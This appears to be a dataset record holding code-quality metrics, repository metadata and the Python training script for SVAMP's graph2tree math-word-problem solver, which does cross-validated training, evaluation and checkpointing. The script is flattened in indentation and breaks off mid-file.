# br_step_data = br_step_data.append(i_run_data, ignore_index=True)
# br_step_data.to_csv("BuildingModelBatch_Step_Data.csv")
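
The batch run above stores each run's step-level records in `BuildingModelBatch_Step_Data.csv`. A minimal, illustrative sketch of loading and inspecting that output afterwards (not part of the original file; it only assumes the CSV produced above exists in the working directory):

```python
import pandas as pd

# Load the step data written by the batch run above.
steps = pd.read_csv("BuildingModelBatch_Step_Data.csv", index_col=0)

# Each row holds one collected model step; the columns come from the
# model reporters defined in BuildingModelBatch (agent types and positions).
print(steps.columns.tolist())
print(steps.head())
```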
Row 1 (fields after `content`):

| Field | Value |
|---|---|
| avg_line_length | 27.729949 |
| max_line_length | 107 |
| alphanum_fraction | 0.668851 |
| qsc_code_num_words_quality_signal | 4,271 |
| qsc_code_num_chars_quality_signal | 27,314 |
| qsc_code_mean_word_length_quality_signal | 4.129478 |
| qsc_code_frac_words_unique_quality_signal | 0.048935 |
| qsc_code_frac_chars_top_2grams_quality_signal | 0.047174 |
| qsc_code_frac_chars_top_3grams_quality_signal | 0.08845 |
| qsc_code_frac_chars_top_4grams_quality_signal | 0.094347 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | 0.81295 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | 0.784487 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | 0.743607 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | 0.718773 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | 0.714974 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | 0.671883 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | 0 |
| qsc_code_frac_chars_digital_quality_signal | 0.027598 |
| qsc_code_frac_chars_whitespace_quality_signal | 0.206707 |
| qsc_code_size_file_byte_quality_signal | 27,314 |
| qsc_code_num_lines_quality_signal | 985 |
| qsc_code_num_chars_line_max_quality_signal | 108 |
| qsc_code_num_chars_line_mean_quality_signal | 27.729949 |
| qsc_code_frac_chars_alphabet_quality_signal | 0.786367 |
| qsc_code_frac_chars_comments_quality_signal | 0.115875 |
| qsc_code_cate_xml_start_quality_signal | 0 |
| qsc_code_frac_lines_dupe_lines_quality_signal | 0.718539 |
| qsc_code_cate_autogen_quality_signal | 0 |
| qsc_code_frac_lines_long_string_quality_signal | 0 |
| qsc_code_frac_chars_string_length_quality_signal | 0.021438 |
| qsc_code_frac_chars_long_word_length_quality_signal | 0.001335 |
| qsc_code_frac_lines_string_concat_quality_signal | 0 |
| qsc_code_cate_encoded_data_quality_signal | 0 |
| qsc_code_frac_chars_hex_words_quality_signal | 0 |
| qsc_code_frac_lines_prompt_comments_quality_signal | 0 |
| qsc_code_frac_lines_assert_quality_signal | 0 |
| qsc_codepython_cate_ast_quality_signal | 1 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | 0.03383 |
| qsc_codepython_cate_var_zero_quality_signal | false |
| qsc_codepython_frac_lines_pass_quality_signal | 0 |
| qsc_codepython_frac_lines_import_quality_signal | 0.013532 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | 0 |
| qsc_codepython_score_lines_no_logic_quality_signal | 0.083897 |
| qsc_codepython_frac_lines_print_quality_signal | 0.002706 |
| qsc_code_num_words | 0 |
| qsc_code_num_chars | 0 |
| qsc_code_mean_word_length | 0 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | 0 |
| qsc_code_frac_chars_top_3grams | 0 |
| qsc_code_frac_chars_top_4grams | 0 |
| qsc_code_frac_chars_dupe_5grams | 1 |
| qsc_code_frac_chars_dupe_6grams | 1 |
| qsc_code_frac_chars_dupe_7grams | 1 |
| qsc_code_frac_chars_dupe_8grams | 1 |
| qsc_code_frac_chars_dupe_9grams | 1 |
| qsc_code_frac_chars_dupe_10grams | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 |
| qsc_code_frac_chars_digital | 0 |
| qsc_code_frac_chars_whitespace | 0 |
| qsc_code_size_file_byte | 0 |
| qsc_code_num_lines | 0 |
| qsc_code_num_chars_line_max | 0 |
| qsc_code_num_chars_line_mean | 0 |
| qsc_code_frac_chars_alphabet | 0 |
| qsc_code_frac_chars_comments | 0 |
| qsc_code_cate_xml_start | 0 |
| qsc_code_frac_lines_dupe_lines | 1 |
| qsc_code_cate_autogen | 0 |
| qsc_code_frac_lines_long_string | 0 |
| qsc_code_frac_chars_string_length | 0 |
| qsc_code_frac_chars_long_word_length | 0 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | 0 |
| qsc_code_frac_chars_hex_words | 0 |
| qsc_code_frac_lines_prompt_comments | 0 |
| qsc_code_frac_lines_assert | 0 |
| qsc_codepython_cate_ast | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 |
| qsc_codepython_cate_var_zero | 0 |
| qsc_codepython_frac_lines_pass | 0 |
| qsc_codepython_frac_lines_import | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 |
| qsc_codepython_score_lines_no_logic | 0 |
| qsc_codepython_frac_lines_print | 0 |
| effective | 0 |
| hits | 7 |
Row 2 (fields before `content`):

| Field | Value |
|---|---|
| hexsha | b47631c6b3f7d6e7c9aa701c54a0051a55def4c3 |
| size | 33,547 |
| ext | py |
| lang | Python |
| max_stars_repo_path | code/graph2tree/src/main.py |
| max_stars_repo_name | arkilpatel/SVAMP |
| max_stars_repo_head_hexsha | 6f09ab516ab06c18e948c0325236e84e80b5d4bd |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | 39 |
| max_stars_repo_stars_event_min_datetime | 2021-04-08T01:24:36.000Z |
| max_stars_repo_stars_event_max_datetime | 2022-03-12T06:51:33.000Z |
| max_issues_repo_path | code/graph2tree/src/main.py |
| max_issues_repo_name | intflow/SVAMP |
| max_issues_repo_head_hexsha | 10731d8ea489f4eb8e12e35c6c2781f8d837866a |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | 8 |
| max_issues_repo_issues_event_min_datetime | 2021-04-12T08:02:05.000Z |
| max_issues_repo_issues_event_max_datetime | 2022-03-07T06:36:39.000Z |
| max_forks_repo_path | code/graph2tree/src/main.py |
| max_forks_repo_name | intflow/SVAMP |
| max_forks_repo_head_hexsha | 10731d8ea489f4eb8e12e35c6c2781f8d837866a |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | 11 |
| max_forks_repo_forks_event_min_datetime | 2021-04-08T01:24:41.000Z |
| max_forks_repo_forks_event_max_datetime | 2021-12-15T22:51:51.000Z |

content (code/graph2tree/src/main.py):
# coding: utf-8
import time
import torch.optim
from collections import OrderedDict
from attrdict import AttrDict
import pandas as pd
try:
import cPickle as pickle
except ImportError:
import pickle
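# cPickle is the faster C implementation of pickle on Python 2; on Python 3 the plain
# pickle module already uses the C implementation, so the fallback is equivalent.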
import json
import pdb
from src.args import build_parser
from src.train_and_evaluate import *
from src.components.models import *
from src.components.contextual_embeddings import *
from src.utils.helper import *
from src.utils.logger import *
from src.utils.expressions_transfer import *
global log_folder
global model_folder
global result_folder
global data_path
global board_path
log_folder = 'logs'
model_folder = 'models'
outputs_folder = 'outputs'
result_folder = './out/'
data_path = './data/'
board_path = './runs/'
def read_json(path):
with open(path,'r') as f:
file = json.load(f)
return file
USE_CUDA = True
def get_new_fold(data,pairs,group):
new_fold = []
for item,pair,g in zip(data, pairs, group):
pair = list(pair)
pair.append(g['group_num'])
pair = tuple(pair)
new_fold.append(pair)
return new_fold
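# change_num converts number tokens such as "(3/4)" or "25%" into plain floats,
# leaving ordinary numerals to be cast directly.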
def change_num(num):
new_num = []
for item in num:
if '/' in item:
new_str = item.split(')')[0]
new_str = new_str.split('(')[1]
a = float(new_str.split('/')[0])
b = float(new_str.split('/')[1])
value = a/b
new_num.append(value)
elif '%' in item:
value = float(item[0:-1])/100
new_num.append(value)
else:
new_num.append(float(item))
return new_num
def main():
parser = build_parser()
args = parser.parse_args()
config = args
if config.mode == 'train':
is_train = True
else:
is_train = False
''' Set seed for reproducibility'''
np.random.seed(config.seed)
torch.manual_seed(config.seed)
random.seed(config.seed)
'''GPU initialization'''
device = gpu_init_pytorch(config.gpu)
if config.full_cv:
global data_path
data_name = config.dataset
data_path = data_path + data_name + '/'
config.val_result_path = os.path.join(result_folder, 'CV_results_{}.json'.format(data_name))
fold_acc_score = 0.0
folds_scores = []
best_acc = []
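# Full cross-validation: train and evaluate once per fold (fold0..fold4), each fold with
# its own run name, log/model/output directories, and vocabulary files.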
for z in range(5):
run_name = config.run_name + '_fold' + str(z)
config.dataset = 'fold' + str(z)
config.log_path = os.path.join(log_folder, run_name)
config.model_path = os.path.join(model_folder, run_name)
config.board_path = os.path.join(board_path, run_name)
config.outputs_path = os.path.join(outputs_folder, run_name)
vocab1_path = os.path.join(config.model_path, 'vocab1.p')
vocab2_path = os.path.join(config.model_path, 'vocab2.p')
config_file = os.path.join(config.model_path, 'config.p')
log_file = os.path.join(config.log_path, 'log.txt')
if config.results:
config.result_path = os.path.join(result_folder, 'val_results_{}.json'.format(config.dataset))
create_save_directories(config.log_path)
create_save_directories(config.model_path)
create_save_directories(config.outputs_path)
logger = get_logger(run_name, log_file, logging.DEBUG)
logger.info('Experiment Name: {}'.format(config.run_name))
logger.debug('Created Relevant Directories')
logger.info('Loading Data...')
train_ls, dev_ls = load_raw_data(data_path, config.dataset, is_train)
pairs_trained, pairs_tested, generate_nums, copy_nums = transfer_num(train_ls, dev_ls, config.challenge_disp)
logger.debug('Data Loaded...')
logger.debug('Number of Training Examples: {}'.format(len(pairs_trained)))
logger.debug('Number of Testing Examples: {}'.format(len(pairs_tested)))
logger.debug('Extra Numbers: {}'.format(generate_nums))
logger.debug('Maximum Number of Numbers: {}'.format(copy_nums))
logger.info('Creating Vocab...')
input_lang = None
output_lang = None
input_lang, output_lang, train_pairs, test_pairs = prepare_data(config, logger, pairs_trained, pairs_tested, config.trim_threshold, generate_nums, copy_nums, input_lang, output_lang, tree=True)
checkpoint = get_latest_checkpoint(config.model_path, logger)
with open(vocab1_path, 'wb') as f:
pickle.dump(input_lang, f, protocol=pickle.HIGHEST_PROTOCOL)
with open(vocab2_path, 'wb') as f:
pickle.dump(output_lang, f, protocol=pickle.HIGHEST_PROTOCOL)
logger.debug('Vocab saved at {}'.format(vocab1_path))
generate_num_ids = []
for num in generate_nums:
generate_num_ids.append(output_lang.word2index[num])
config.len_generate_nums = len(generate_nums)
config.copy_nums = copy_nums
with open(config_file, 'wb') as f:
pickle.dump(vars(config), f, protocol=pickle.HIGHEST_PROTOCOL)
logger.debug('Config File Saved')
logger.info('Initializing Models...')
# Initialize models
embedding = None
if config.embedding == 'bert':
embedding = BertEncoder(config.emb_name, device, config.freeze_emb)
elif config.embedding == 'roberta':
embedding = RobertaEncoder(config.emb_name, device, config.freeze_emb)
else:
embedding = Embedding(config, input_lang, input_size=input_lang.n_words, embedding_size=config.embedding_size, dropout=config.dropout)
encoder = EncoderSeq(cell_type=config.cell_type, embedding_size=config.embedding_size, hidden_size=config.hidden_size, n_layers=config.depth, dropout=config.dropout)
predict = Prediction(hidden_size=config.hidden_size, op_nums=output_lang.n_words - copy_nums - 1 - len(generate_nums), input_size=len(generate_nums), dropout=config.dropout)
generate = GenerateNode(hidden_size=config.hidden_size, op_nums=output_lang.n_words - copy_nums - 1 - len(generate_nums), embedding_size=config.embedding_size, dropout=config.dropout)
merge = Merge(hidden_size=config.hidden_size, embedding_size=config.embedding_size, dropout=config.dropout)
# the embedding layer is only for generated number embeddings, operators, and paddings
logger.debug('Models Initialized')
logger.info('Initializing Optimizers...')
embedding_optimizer = torch.optim.Adam(embedding.parameters(), lr=config.emb_lr, weight_decay=config.weight_decay)
encoder_optimizer = torch.optim.Adam(encoder.parameters(), lr=config.lr, weight_decay=config.weight_decay)
predict_optimizer = torch.optim.Adam(predict.parameters(), lr=config.lr, weight_decay=config.weight_decay)
generate_optimizer = torch.optim.Adam(generate.parameters(), lr=config.lr, weight_decay=config.weight_decay)
merge_optimizer = torch.optim.Adam(merge.parameters(), lr=config.lr, weight_decay=config.weight_decay)
logger.debug('Optimizers Initialized')
logger.info('Initializing Schedulers...')
embedding_scheduler = torch.optim.lr_scheduler.StepLR(embedding_optimizer, step_size=20, gamma=0.5)
encoder_scheduler = torch.optim.lr_scheduler.StepLR(encoder_optimizer, step_size=20, gamma=0.5)
predict_scheduler = torch.optim.lr_scheduler.StepLR(predict_optimizer, step_size=20, gamma=0.5)
generate_scheduler = torch.optim.lr_scheduler.StepLR(generate_optimizer, step_size=20, gamma=0.5)
merge_scheduler = torch.optim.lr_scheduler.StepLR(merge_optimizer, step_size=20, gamma=0.5)
logger.debug('Schedulers Initialized')
logger.info('Loading Models on GPU {}...'.format(config.gpu))
# Move models to GPU
if USE_CUDA:
embedding.to(device)
encoder.to(device)
predict.to(device)
generate.to(device)
merge.to(device)
logger.debug('Models loaded on GPU {}'.format(config.gpu))
max_value_corr = 0
len_total_eval = 0
max_val_acc = 0.0
max_train_acc = 0.0
eq_acc = 0.0
best_epoch = -1
min_train_loss = float('inf')
logger.info('Starting Training Procedure')
for epoch in range(config.epochs):
loss_total = 0
input_batches, input_lengths, output_batches, output_lengths, nums_batches, num_stack_batches, num_pos_batches, num_size_batches, num_value_batches, graph_batches, group_batches = prepare_train_batch(train_pairs, config.batch_size)
od = OrderedDict()
od['Epoch'] = epoch + 1
print_log(logger, od)
start = time.time()
for idx in range(len(input_lengths)):
loss = train_tree(
config, input_batches[idx], input_lengths[idx], output_batches[idx], output_lengths[idx],
num_stack_batches[idx], num_size_batches[idx], num_value_batches[idx], group_batches[idx], generate_num_ids, embedding, encoder, predict, generate, merge,
embedding_optimizer, encoder_optimizer, predict_optimizer, generate_optimizer, merge_optimizer, input_lang, output_lang,
num_pos_batches[idx], graph_batches[idx])
loss_total += loss
print("Completed {} / {}...".format(idx, len(input_lengths)), end = '\r', flush = True)
embedding_scheduler.step()
encoder_scheduler.step()
predict_scheduler.step()
generate_scheduler.step()
merge_scheduler.step()
logger.debug('Training for epoch {} completed...\nTime Taken: {}'.format(epoch, time_since(time.time() - start)))
if loss_total / len(input_lengths) < min_train_loss:
min_train_loss = loss_total / len(input_lengths)
train_value_ac = 0
train_equation_ac = 0
train_eval_total = 1
if config.show_train_acc:
train_eval_total = 0
logger.info('Computing Train Accuracy')
start = time.time()
with torch.no_grad():
for train_batch in train_pairs:
batch_graph = get_single_example_graph(train_batch[0], train_batch[1], train_batch[7], train_batch[4], train_batch[5])
train_res = evaluate_tree(config, train_batch[0], train_batch[1], generate_num_ids, embedding, encoder, predict, generate,
merge, input_lang, output_lang, train_batch[4], train_batch[5], batch_graph, train_batch[7], beam_size=config.beam_size)
train_val_ac, train_equ_ac, _, _ = compute_prefix_tree_result(train_res, train_batch[2], output_lang, train_batch[4], train_batch[6])
if train_val_ac:
train_value_ac += 1
if train_equ_ac:
train_equation_ac += 1
train_eval_total += 1
logger.debug('Train Accuracy Computed...\nTime Taken: {}'.format(time_since(time.time() - start)))
logger.info('Starting Validation')
value_ac = 0
equation_ac = 0
eval_total = 0
start = time.time()
with open(config.outputs_path + '/outputs.txt', 'a') as f_out:
f_out.write('---------------------------------------\n')
f_out.write('Epoch: ' + str(epoch) + '\n')
f_out.write('---------------------------------------\n')
f_out.close()
ex_num = 0
for test_batch in test_pairs:
batch_graph = get_single_example_graph(test_batch[0], test_batch[1], test_batch[7], test_batch[4], test_batch[5])
test_res = evaluate_tree(config, test_batch[0], test_batch[1], generate_num_ids, embedding, encoder, predict, generate,
merge, input_lang, output_lang, test_batch[4], test_batch[5], batch_graph, test_batch[7], beam_size=config.beam_size)
val_ac, equ_ac, _, _ = compute_prefix_tree_result(test_res, test_batch[2], output_lang, test_batch[4], test_batch[6])
cur_result = 0
if val_ac:
value_ac += 1
cur_result = 1
if equ_ac:
equation_ac += 1
eval_total += 1
with open(config.outputs_path + '/outputs.txt', 'a') as f_out:
f_out.write('Example: ' + str(ex_num) + '\n')
f_out.write('Source: ' + stack_to_string(sentence_from_indexes(input_lang, test_batch[0])) + '\n')
f_out.write('Target: ' + stack_to_string(sentence_from_indexes(output_lang, test_batch[2])) + '\n')
f_out.write('Generated: ' + stack_to_string(sentence_from_indexes(output_lang, test_res)) + '\n')
if config.nums_disp:
src_nums = len(test_batch[4])
tgt_nums = 0
pred_nums = 0
for k_tgt in sentence_from_indexes(output_lang, test_batch[2]):
if k_tgt not in ['+', '-', '*', '/']:
tgt_nums += 1
for k_pred in sentence_from_indexes(output_lang, test_res):
if k_pred not in ['+', '-', '*', '/']:
pred_nums += 1
f_out.write('Numbers in question: ' + str(src_nums) + '\n')
f_out.write('Numbers in Target Equation: ' + str(tgt_nums) + '\n')
f_out.write('Numbers in Predicted Equation: ' + str(pred_nums) + '\n')
f_out.write('Result: ' + str(cur_result) + '\n' + '\n')
f_out.close()
ex_num+=1
if float(train_value_ac) / train_eval_total > max_train_acc:
max_train_acc = float(train_value_ac) / train_eval_total
if float(value_ac) / eval_total > max_val_acc:
max_value_corr = value_ac
len_total_eval = eval_total
max_val_acc = float(value_ac) / eval_total
eq_acc = float(equation_ac) / eval_total
best_epoch = epoch+1
state = {
'epoch' : epoch,
'best_epoch': best_epoch-1,
'embedding_state_dict': embedding.state_dict(),
'encoder_state_dict': encoder.state_dict(),
'predict_state_dict': predict.state_dict(),
'generate_state_dict': generate.state_dict(),
'merge_state_dict': merge.state_dict(),
'embedding_optimizer_state_dict': embedding_optimizer.state_dict(),
'encoder_optimizer_state_dict': encoder_optimizer.state_dict(),
'predict_optimizer_state_dict': predict_optimizer.state_dict(),
'generate_optimizer_state_dict': generate_optimizer.state_dict(),
'merge_optimizer_state_dict': merge_optimizer.state_dict(),
'embedding_scheduler_state_dict': embedding_scheduler.state_dict(),
'encoder_scheduler_state_dict': encoder_scheduler.state_dict(),
'predict_scheduler_state_dict': predict_scheduler.state_dict(),
'generate_scheduler_state_dict': generate_scheduler.state_dict(),
'merge_scheduler_state_dict': merge_scheduler.state_dict(),
'voc1': input_lang,
'voc2': output_lang,
'train_loss_epoch' : loss_total / len(input_lengths),
'min_train_loss' : min_train_loss,
'val_acc_epoch' : float(value_ac) / eval_total,
'max_val_acc' : max_val_acc,
'equation_acc' : eq_acc,
'max_train_acc' : max_train_acc,
'generate_nums' : generate_nums
}
if config.save_model:
save_checkpoint(state, epoch, logger, config.model_path, config.ckpt)
od = OrderedDict()
od['Epoch'] = epoch + 1
od['best_epoch'] = best_epoch
od['train_loss_epoch'] = loss_total / len(input_lengths)
od['min_train_loss'] = min_train_loss
od['train_acc_epoch'] = float(train_value_ac) / train_eval_total
od['max_train_acc'] = max_train_acc
od['val_acc_epoch'] = float(value_ac) / eval_total
od['equation_acc_epoch'] = float(equation_ac) / eval_total
od['max_val_acc'] = max_val_acc
od['equation_acc'] = eq_acc
print_log(logger, od)
logger.debug('Validation Completed...\nTime Taken: {}'.format(time_since(time.time() - start)))
if config.results:
store_results(config, max_train_acc, max_val_acc, eq_acc, min_train_loss, best_epoch)
logger.info('Scores saved at {}'.format(config.result_path))
best_acc.append((max_value_corr, len_total_eval))
total_value_corr = 0
total_len = 0
for w in range(len(best_acc)):
folds_scores.append(float(best_acc[w][0])/best_acc[w][1])
total_value_corr += best_acc[w][0]
total_len += best_acc[w][1]
fold_acc_score = float(total_value_corr)/total_len
store_val_results(config, fold_acc_score, folds_scores)
logger.info('Final Val score: {}'.format(fold_acc_score))
else:
run_name = config.run_name
config.log_path = os.path.join(log_folder, run_name)
config.model_path = os.path.join(model_folder, run_name)
config.board_path = os.path.join(board_path, run_name)
config.outputs_path = os.path.join(outputs_folder, run_name)
vocab1_path = os.path.join(config.model_path, 'vocab1.p')
vocab2_path = os.path.join(config.model_path, 'vocab2.p')
config_file = os.path.join(config.model_path, 'config.p')
log_file = os.path.join(config.log_path, 'log.txt')
if config.results:
config.result_path = os.path.join(result_folder, 'val_results_{}.json'.format(config.dataset))
if is_train:
create_save_directories(config.log_path)
create_save_directories(config.model_path)
create_save_directories(config.outputs_path)
else:
create_save_directories(config.log_path)
create_save_directories(config.result_path)
logger = get_logger(run_name, log_file, logging.DEBUG)
logger.info('Experiment Name: {}'.format(config.run_name))
logger.debug('Created Relevant Directories')
logger.info('Loading Data...')
train_ls, dev_ls = load_raw_data(data_path, config.dataset, is_train)
pairs_trained, pairs_tested, generate_nums, copy_nums = transfer_num(train_ls, dev_ls, config.challenge_disp)
logger.debug('Data Loaded...')
if is_train:
logger.debug('Number of Training Examples: {}'.format(len(pairs_trained)))
logger.debug('Number of Testing Examples: {}'.format(len(pairs_tested)))
logger.debug('Extra Numbers: {}'.format(generate_nums))
logger.debug('Maximum Number of Numbers: {}'.format(copy_nums))
if is_train:
logger.info('Creating Vocab...')
input_lang = None
output_lang = None
else:
logger.info('Loading Vocab File...')
with open(vocab1_path, 'rb') as f:
input_lang = pickle.load(f)
with open(vocab2_path, 'rb') as f:
output_lang = pickle.load(f)
logger.info('Vocab Files loaded from {}\nNumber of Words: {}'.format(vocab1_path, input_lang.n_words))
input_lang, output_lang, train_pairs, test_pairs = prepare_data(config, logger, pairs_trained, pairs_tested, config.trim_threshold, generate_nums, copy_nums, input_lang, output_lang, tree=True)
checkpoint = get_latest_checkpoint(config.model_path, logger)
if is_train:
with open(vocab1_path, 'wb') as f:
pickle.dump(input_lang, f, protocol=pickle.HIGHEST_PROTOCOL)
with open(vocab2_path, 'wb') as f:
pickle.dump(output_lang, f, protocol=pickle.HIGHEST_PROTOCOL)
logger.debug('Vocab saved at {}'.format(vocab1_path))
generate_num_ids = []
for num in generate_nums:
generate_num_ids.append(output_lang.word2index[num])
config.len_generate_nums = len(generate_nums)
config.copy_nums = copy_nums
with open(config_file, 'wb') as f:
pickle.dump(vars(config), f, protocol=pickle.HIGHEST_PROTOCOL)
logger.debug('Config File Saved')
logger.info('Initializing Models...')
# Initialize models
embedding = None
if config.embedding == 'bert':
embedding = BertEncoder(config.emb_name, device, config.freeze_emb)
elif config.embedding == 'roberta':
embedding = RobertaEncoder(config.emb_name, device, config.freeze_emb)
else:
embedding = Embedding(config, input_lang, input_size=input_lang.n_words, embedding_size=config.embedding_size, dropout=config.dropout)
encoder = EncoderSeq(cell_type=config.cell_type, embedding_size=config.embedding_size, hidden_size=config.hidden_size, n_layers=config.depth, dropout=config.dropout)
predict = Prediction(hidden_size=config.hidden_size, op_nums=output_lang.n_words - copy_nums - 1 - len(generate_nums), input_size=len(generate_nums), dropout=config.dropout)
generate = GenerateNode(hidden_size=config.hidden_size, op_nums=output_lang.n_words - copy_nums - 1 - len(generate_nums), embedding_size=config.embedding_size, dropout=config.dropout)
merge = Merge(hidden_size=config.hidden_size, embedding_size=config.embedding_size, dropout=config.dropout)
# the embedding layer is only for generated number embeddings, operators, and paddings
logger.debug('Models Initialized')
logger.info('Initializing Optimizers...')
embedding_optimizer = torch.optim.Adam(embedding.parameters(), lr=config.emb_lr, weight_decay=config.weight_decay)
encoder_optimizer = torch.optim.Adam(encoder.parameters(), lr=config.lr, weight_decay=config.weight_decay)
predict_optimizer = torch.optim.Adam(predict.parameters(), lr=config.lr, weight_decay=config.weight_decay)
generate_optimizer = torch.optim.Adam(generate.parameters(), lr=config.lr, weight_decay=config.weight_decay)
merge_optimizer = torch.optim.Adam(merge.parameters(), lr=config.lr, weight_decay=config.weight_decay)
logger.debug('Optimizers Initialized')
logger.info('Initializing Schedulers...')
embedding_scheduler = torch.optim.lr_scheduler.StepLR(embedding_optimizer, step_size=20, gamma=0.5)
encoder_scheduler = torch.optim.lr_scheduler.StepLR(encoder_optimizer, step_size=20, gamma=0.5)
predict_scheduler = torch.optim.lr_scheduler.StepLR(predict_optimizer, step_size=20, gamma=0.5)
generate_scheduler = torch.optim.lr_scheduler.StepLR(generate_optimizer, step_size=20, gamma=0.5)
merge_scheduler = torch.optim.lr_scheduler.StepLR(merge_optimizer, step_size=20, gamma=0.5)
logger.debug('Schedulers Initialized')
logger.info('Loading Models on GPU {}...'.format(config.gpu))
# Move models to GPU
if USE_CUDA:
embedding.to(device)
encoder.to(device)
predict.to(device)
generate.to(device)
merge.to(device)
logger.debug('Models loaded on GPU {}'.format(config.gpu))
max_val_acc = 0.0
max_train_acc = 0.0
eq_acc = 0.0
best_epoch = -1
min_train_loss = float('inf')
logger.info('Starting Training Procedure')
for epoch in range(config.epochs):
loss_total = 0
input_batches, input_lengths, output_batches, output_lengths, nums_batches, num_stack_batches, num_pos_batches, num_size_batches, num_value_batches, graph_batches, group_batches = prepare_train_batch(train_pairs, config.batch_size)
od = OrderedDict()
od['Epoch'] = epoch + 1
print_log(logger, od)
start = time.time()
for idx in range(len(input_lengths)):
loss = train_tree(
config, input_batches[idx], input_lengths[idx], output_batches[idx], output_lengths[idx],
num_stack_batches[idx], num_size_batches[idx], num_value_batches[idx], group_batches[idx], generate_num_ids, embedding, encoder, predict, generate, merge,
embedding_optimizer, encoder_optimizer, predict_optimizer, generate_optimizer, merge_optimizer, input_lang, output_lang,
num_pos_batches[idx], graph_batches[idx])
loss_total += loss
print("Completed {} / {}...".format(idx, len(input_lengths)), end = '\r', flush = True)
embedding_scheduler.step()
encoder_scheduler.step()
predict_scheduler.step()
generate_scheduler.step()
merge_scheduler.step()
logger.debug('Training for epoch {} completed...\nTime Taken: {}'.format(epoch, time_since(time.time() - start)))
if loss_total / len(input_lengths) < min_train_loss:
min_train_loss = loss_total / len(input_lengths)
train_value_ac = 0
train_equation_ac = 0
train_eval_total = 1
if config.show_train_acc:
train_eval_total = 0
logger.info('Computing Train Accuracy')
start = time.time()
with torch.no_grad():
for train_batch in train_pairs:
batch_graph = get_single_example_graph(train_batch[0], train_batch[1], train_batch[7], train_batch[4], train_batch[5])
train_res = evaluate_tree(config, train_batch[0], train_batch[1], generate_num_ids, embedding, encoder, predict, generate,
merge, input_lang, output_lang, train_batch[4], train_batch[5], batch_graph, train_batch[7], beam_size=config.beam_size)
train_val_ac, train_equ_ac, _, _ = compute_prefix_tree_result(train_res, train_batch[2], output_lang, train_batch[4], train_batch[6])
if train_val_ac:
train_value_ac += 1
if train_equ_ac:
train_equation_ac += 1
train_eval_total += 1
logger.debug('Train Accuracy Computed...\nTime Taken: {}'.format(time_since(time.time() - start)))
logger.info('Starting Validation')
value_ac = 0
equation_ac = 0
eval_total = 0
start = time.time()
with open(config.outputs_path + '/outputs.txt', 'a') as f_out:
f_out.write('---------------------------------------\n')
f_out.write('Epoch: ' + str(epoch) + '\n')
f_out.write('---------------------------------------\n')
f_out.close()
ex_num = 0
for test_batch in test_pairs:
batch_graph = get_single_example_graph(test_batch[0], test_batch[1], test_batch[7], test_batch[4], test_batch[5])
test_res = evaluate_tree(config, test_batch[0], test_batch[1], generate_num_ids, embedding, encoder, predict, generate,
merge, input_lang, output_lang, test_batch[4], test_batch[5], batch_graph, test_batch[7], beam_size=config.beam_size)
val_ac, equ_ac, _, _ = compute_prefix_tree_result(test_res, test_batch[2], output_lang, test_batch[4], test_batch[6])
cur_result = 0
if val_ac:
value_ac += 1
cur_result = 1
if equ_ac:
equation_ac += 1
eval_total += 1
with open(config.outputs_path + '/outputs.txt', 'a') as f_out:
f_out.write('Example: ' + str(ex_num) + '\n')
f_out.write('Source: ' + stack_to_string(sentence_from_indexes(input_lang, test_batch[0])) + '\n')
f_out.write('Target: ' + stack_to_string(sentence_from_indexes(output_lang, test_batch[2])) + '\n')
f_out.write('Generated: ' + stack_to_string(sentence_from_indexes(output_lang, test_res)) + '\n')
if config.challenge_disp:
f_out.write('Type: ' + test_batch[8] + '\n')
f_out.write('Variation Type: ' + test_batch[9] + '\n')
f_out.write('Annotator: ' + test_batch[10] + '\n')
f_out.write('Alternate: ' + str(test_batch[11]) + '\n')
if config.nums_disp:
src_nums = len(test_batch[4])
tgt_nums = 0
pred_nums = 0
for k_tgt in sentence_from_indexes(output_lang, test_batch[2]):
if k_tgt not in ['+', '-', '*', '/']:
tgt_nums += 1
for k_pred in sentence_from_indexes(output_lang, test_res):
if k_pred not in ['+', '-', '*', '/']:
pred_nums += 1
f_out.write('Numbers in question: ' + str(src_nums) + '\n')
f_out.write('Numbers in Target Equation: ' + str(tgt_nums) + '\n')
f_out.write('Numbers in Predicted Equation: ' + str(pred_nums) + '\n')
f_out.write('Result: ' + str(cur_result) + '\n' + '\n')
f_out.close()
ex_num+=1
if float(train_value_ac) / train_eval_total > max_train_acc:
max_train_acc = float(train_value_ac) / train_eval_total
if float(value_ac) / eval_total > max_val_acc:
max_val_acc = float(value_ac) / eval_total
eq_acc = float(equation_ac) / eval_total
best_epoch = epoch+1
state = {
'epoch' : epoch,
'best_epoch': best_epoch-1,
'embedding_state_dict': embedding.state_dict(),
'encoder_state_dict': encoder.state_dict(),
'predict_state_dict': predict.state_dict(),
'generate_state_dict': generate.state_dict(),
'merge_state_dict': merge.state_dict(),
'embedding_optimizer_state_dict': embedding_optimizer.state_dict(),
'encoder_optimizer_state_dict': encoder_optimizer.state_dict(),
'predict_optimizer_state_dict': predict_optimizer.state_dict(),
'generate_optimizer_state_dict': generate_optimizer.state_dict(),
'merge_optimizer_state_dict': merge_optimizer.state_dict(),
'embedding_scheduler_state_dict': embedding_scheduler.state_dict(),
'encoder_scheduler_state_dict': encoder_scheduler.state_dict(),
'predict_scheduler_state_dict': predict_scheduler.state_dict(),
'generate_scheduler_state_dict': generate_scheduler.state_dict(),
'merge_scheduler_state_dict': merge_scheduler.state_dict(),
'voc1': input_lang,
'voc2': output_lang,
'train_loss_epoch' : loss_total / len(input_lengths),
'min_train_loss' : min_train_loss,
'val_acc_epoch' : float(value_ac) / eval_total,
'max_val_acc' : max_val_acc,
'equation_acc' : eq_acc,
'max_train_acc' : max_train_acc,
'generate_nums' : generate_nums
}
if config.save_model:
